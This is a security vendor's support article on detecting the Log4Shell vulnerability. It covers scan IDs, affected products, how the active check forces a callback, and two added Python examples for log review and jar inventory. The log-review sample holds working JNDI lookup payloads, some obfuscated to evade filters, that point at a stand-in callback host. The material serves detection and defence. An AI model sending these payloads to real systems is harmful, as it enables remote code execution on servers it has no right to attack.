How does Holm Security support detection of the Log4j (Log4Shell) vulnerability?

Information about the Log4j vulnerability

General information

CVE-2021-44228 is a Remote Code Execution (RCE) vulnerability impacting Log4j version 2. The vulnerability is also known as Log4Shell.

Log4j is a common logging framework for Java-based applications that any developer can embed in their software. The impact of this vulnerability is therefore widespread, affecting both platforms and individual applications.

Read more about this vulnerability in our blog

How to scan for this vulnerability

To check if your systems are affected by the Log4j 2 vulnerability, you will need to run an Authenticated Network Scan using Holm Security VMP.

You will find detailed information about setting up your authenticated scanning profile in this article:
https://support.holmsecurity.com/hc/en-us/articles/212841809

And you can find more information in this section:
https://support.holmsecurity.com/knowledge/system-network-scanning

If your system is vulnerable, you will find one of the following HIDs in your generated scan report depending on your operating system:

  • HID-2-1-371879
  • HID-2-1-371866
  • HID-2-1-026309
  • HID-2-1-939587
  • HID-2-1-341380 (can be run unauthenticated, only on external scan nodes)
  • HID-2-1-341387
  • HID-2-1-341388
  • HID-2-1-341389
  • HID-2-1-371872
  • HID-2-1-341381
  • HID-2-1-341395
  • HID-2-1-341383
  • HID-2-1-341382
  • HID-2-1-5348677 Apache Log4j Version Detection (Windows) Authenticated
  • HID-2-1-5348688 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348682 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348681 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348680 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348683 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348686 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348685 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348689 (run unauthenticated, only on external scan nodes)
  • HID-2-1-939589 
  • HID-2-1-371836 
  • HID-2-1-371835 
  • HID-2-1-043901 
  • HID-2-1-043927 
  • HID-2-1-371827 
  • HID-2-1-5348693 
  • HID-2-1-5348694 
  • HID-2-1-371816 
  • HID-2-1-5348690 
  • HID-2-1-341309 
  • HID-2-1-5348691 
  • HID-2-1-5348698 
  • HID-2-1-5348687 
  • HID-2-1-079625 
  • HID-2-1-043933 
  • HID-2-1-079624 
  • HID-2-1-5348675 
  • HID-2-1-5348628
  • HID-2-1-5348617
  • HID-2-1-5348621
  • HID-2-1-5348699
  • HID-2-1-5348604
  • HID-2-1-5348619
  • HID-2-1-5348610
  • HID-2-1-5348613
  • HID-2-1-5348607
  • HID-2-1-5348614
  • HID-2-1-043947
  • HID-2-1-043943
  • HID-2-1-341318
  • HID-2-1-341317
  • HID-2-1-341302
  • HID-2-1-341303
  • HID-2-1-939581
  • HID-2-1-079632
  • HID-2-1-026319
  • HID-2-1-5348620
  • HID-2-1-5348618 
  • HID-2-1-5348629 

Released

  • ArcGIS Server Log4j RCE Vulnerability (000026951) - CVE-2021-44228
  • Cisco Identity Services Engine Log4j RCE Vulnerability (CSCwa47133)
  • Cisco Unified Communications Manager IM & Presence Service Log4j RCE Vulnerability (CSCwa47393)
  • Cisco Unified Communications Manager Log4j RCE Vulnerability (CSCwa47249)
  • IBM WebSphere Application Server Log4j RCE Vulnerability (6525706, Log4Shell) - CVE-2021-44228
  • Ubuntu log4j Vulnerability CVE-2021-44228
  • Elastic Logstash Multiple Log4j Vulnerabilities (Dec 2021)
  • Apache Log4j 2.0.x Multiple Vulnerabilities (Linux/Unix, Log4Shell) - Version Check
  • Apache JSPWiki 2.11.0 Log4j RCE Vulnerability (Log4Shell) - Active Check
  • Apache JSPWiki 2.11.0 Log4j RCE Vulnerability (Log4Shell) - Version Check
  • Apache Log4j 1.2.x RCE Vulnerability (Windows, Dec 2021) - Version Check
  • Apache Log4j 1.2.x RCE Vulnerability (Linux/Unix, Dec 2021) - Version Check
  • Ubuntu: Security Advisory for apache-log4j2 (USN-5192-1)
  • Fedora: Security Advisory for log4j (FEDORA-2021-f0f501d01f)
  • Ubuntu: Security Advisory for apache-log4j2 (USN-5197-1)
  • Apache Log4j 2.0.x Multiple Vulnerabilities (Windows, Log4Shell) - Version Check
  • Fedora: Security Advisory for log4j (FEDORA-2021-66d6c484f3)
  • Fedora: Security Advisory for jansi (FEDORA-2021-66d6c484f3)
  • Apache Archiva < 2.2.6 Multiple Log4j Vulnerabilities (Log4Shell)
  • Apache Tika Server 2.x < 2.2.0 Log4j RCE Vulnerability (Log4Shell)

VMware and Windows:

  • Apache Log4j Version Detection (Windows)
  • VMware vCenter Server 6.5, 6.7, 7.0 Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Automation 7.6 and 8.x Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Log Insight 8.2, 8.3, 8.4 and 8.6 Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Operations 8.x Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Orchestrator 7.6 and 8.x Log4j RCE Vulnerability (VMSA-2021-0028)
  • Wowza Streaming Engine Log4j RCE Vulnerability - CVE-2021-44228
  • Splunk Enterprise 8.1.x, 8.2.x Log4j RCE Vulnerability - CVE-2021-44228
  • Apache Solr 7.x, 8.x Log4j RCE Vulnerability - CVE-2021-44228
  • Cisco Webex Meetings Server Log4j RCE Vulnerability (CSCwa47283)

To scan specifically for this vulnerability, you can set up a scan profile that includes the HIDs listed above, for example:

(screenshot: example scan profile containing the Log4j HIDs)

How the active exploitation scripts work

In our active scripts, we try to exploit the Log4j vulnerability and force the scanned targets to initiate a connection back to our scanner. In the case of HTTP active exploitation, for example, we try to inject a specially crafted payload into different HTTP headers. The payload looks like this:

(screenshot: the injected payload, which references ownip and random_port)

ownip is the IP address of our scanner and random_port is the port we have chosen to receive the connection on.

Note that you will need to whitelist the port range 40,000-41,000 in your firewall rules, as this is the port range the scanner uses to receive connection requests for the Log4j exploitation. The vulnerability is reported when our scanner detects a connection request from the target IP to the scanner IP on the selected port.
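As an added example (not Holm Security's code and not the scanner's payload), the following Python script shows the defender's side of the mechanism described above: it normalizes the lookup obfuscation that Log4j itself evaluates (${lower:...}, ${upper:...} and the ${key:-default} fallback) and flags access-log lines that carry a ${jndi:...} lookup, which is what a scanner's or an attacker's callback payload leaves behind in web server logs. The log lines, hostnames and ports are constructed for the example; the ports simply fall in the 40,000-41,000 range mentioned above.

```python
"""Added example (not Holm Security code): flag HTTP access-log lines that carry
Log4j JNDI lookup strings, including the common obfuscated forms."""
import re

# Innermost ${...} expression: the body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalization a JNDI lookup reads ${jndi:<scheme>:...}; the lookup
# name is matched case-insensitively because Log4j lower-cases it as well.
JNDI_MARKER = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost Log4j lookup the way the obfuscators rely on."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)                 # keep: this is what we detect
    if ":-" in body:                          # ${key:-default} -> default
        return body.split(":-", 1)[1]
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    return match.group(0)                     # unknown lookup: leave as is


def normalize(text):
    """Repeatedly collapse innermost lookups until nothing changes."""
    previous = None
    while previous != text:
        previous, text = text, INNERMOST_LOOKUP.sub(_resolve, text)
    return text


def find_jndi_lookups(line):
    """Return the JNDI schemes (ldap, rmi, dns, ...) found in one log line."""
    return [m.group(1).lower() for m in JNDI_MARKER.finditer(normalize(line))]


def scan_log(lines):
    """Return one hit per line that contains a JNDI lookup after normalization."""
    hits = []
    for number, line in enumerate(lines, 1):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append({"line": number, "schemes": schemes,
                         "normalized": normalize(line)})
    return hits


# Constructed sample in Apache combined log format; hosts and ports are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example.net:40123/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:01:04 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://scanner.example.net:40124/a} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.10 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:rmi://scanner.example.net:40125/a}" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:10:01:06 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['schemes']} -> {hit['normalized']}")
```

Lines 2, 3 and 4 of the sample are flagged (the last one only after the ${::-x} fragments are collapsed into "jndi"), while the plain ${date:yyyy} lookup on line 5 is not. Matching on the raw string "${jndi:" alone would miss lines 3 and 4, which is why the normalization step matters for log review.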

Besides the active exploitation plugins, our scripts can also check for vulnerable Log4j packages present on the target machine using an authenticated scan.

A few examples of files that can be detected are:

  • log4j-core-java9-2.13.3.pom
  • log4j-2.13.3.pom
  • log4j-core-2.13.3.jar
  • log4j-core-2.13.3.pom, etc.
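As an added example (not Holm Security's code, and not how the product's authenticated checks are implemented), the following Python script shows what such a file-based check looks like from the administrator's side: it walks a directory tree for artifacts named like the files listed above, classifies the version in the file name against CVE-2021-44228, and, for jars, opens the archive to see whether the JndiLookup class is still present (removing that class from log4j-core was the documented interim mitigation). The directory tree and the stand-in jars are constructed by the script itself; the function and file names are the example's own.

```python
"""Added example (not Holm Security code): locate Log4j artifacts on disk,
classify their version against CVE-2021-44228 and check whether a jar still
ships the JndiLookup class."""
import os
import re
import tempfile
import zipfile

# Matches log4j-core-2.13.3.jar, log4j-core-java9-2.13.3.pom, log4j-2.13.3.pom
ARTIFACT_RE = re.compile(r"^log4j(?:-core)?(?:-java9)?-(\d[\w.\-]*)\.(jar|pom)$")
# Class whose removal from log4j-core was the documented interim mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.0-beta9' -> ((2, 0, 0), 'beta9'); '2.13.3' -> ((2, 13, 3), '')."""
    base, _, tag = text.partition("-")
    nums = tuple(int(p) for p in base.split(".") if p.isdigit())
    nums = (nums + (0, 0, 0))[:3]
    return nums, tag.lower()


def affected_by_cve_2021_44228(version):
    """Log4j 2.0-beta9 through 2.14.1, except the 2.3.1 and 2.12.2 backports."""
    nums, tag = parse_version(version)
    major, minor, patch = nums
    if major != 2 or nums >= (2, 15, 0):
        return False
    if nums == (2, 0, 0) and tag.startswith("beta"):
        number = re.search(r"\d+", tag)
        return bool(number) and int(number.group()) >= 9
    if minor == 12 and patch >= 2:      # 2.12.2 carried the fix for Java 7
        return False
    if minor == 3 and patch >= 1:       # 2.3.1 carried the fix for Java 6
        return False
    return True


def assess_file(path):
    """Return a finding dict for a Log4j artifact, or None for other files."""
    match = ARTIFACT_RE.match(os.path.basename(path))
    if not match:
        return None
    version, kind = match.groups()
    finding = {"path": path, "version": version, "kind": kind,
               "cve_2021_44228": affected_by_cve_2021_44228(version),
               "jndi_lookup_present": None}       # only known for jars
    if kind == "jar" and zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as jar:
            finding["jndi_lookup_present"] = JNDI_LOOKUP_CLASS in jar.namelist()
    return finding


def scan_tree(root):
    """Walk a directory tree and collect findings for every Log4j artifact."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            finding = assess_file(os.path.join(dirpath, name))
            if finding:
                findings.append(finding)
    return findings


def _write_jar(path, with_jndi_lookup):
    """Constructed stand-in for a log4j-core jar: a zip with or without the class."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")


def build_sample_tree():
    """Constructed directory tree that exercises each outcome."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    for sub in ("app1/lib", "app2/lib", "app3", "app4/lib"):
        os.makedirs(os.path.join(root, sub))
    _write_jar(os.path.join(root, "app1/lib/log4j-core-2.13.3.jar"), True)   # vulnerable
    _write_jar(os.path.join(root, "app2/lib/log4j-core-2.14.1.jar"), False)  # class removed
    _write_jar(os.path.join(root, "app4/lib/log4j-core-2.17.1.jar"), True)   # fixed release
    with open(os.path.join(root, "app3/log4j-core-java9-2.13.3.pom"), "w") as pom:
        pom.write("<project/>\n")
    with open(os.path.join(root, "app3/README.txt"), "w") as other:
        other.write("not a log4j artifact\n")
    return root


def demo():
    """Scan the constructed tree; findings keyed by file name."""
    findings = scan_tree(build_sample_tree())
    return {os.path.basename(f["path"]): f for f in findings}


if __name__ == "__main__":
    for name, f in sorted(demo().items()):
        print(name, f["version"], "CVE-2021-44228:", f["cve_2021_44228"],
              "JndiLookup.class:", f["jndi_lookup_present"])
```

The 2.14.1 jar is still reported as a vulnerable version even though its JndiLookup class has been removed, so both columns are needed to judge a host: the version tells you whether the upgrade has happened, the class check tells you whether the interim mitigation was applied. A name-based match like this misses Log4j that has been shaded or repackaged into an application's own jar; a fuller inventory opens every jar on the host and looks for the class regardless of the file name.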

We also have broad coverage of enterprise applications such as VMware vCenter, VMware vRealize, Splunk, Elasticsearch, Cisco Webex, UCS, UCM, etc.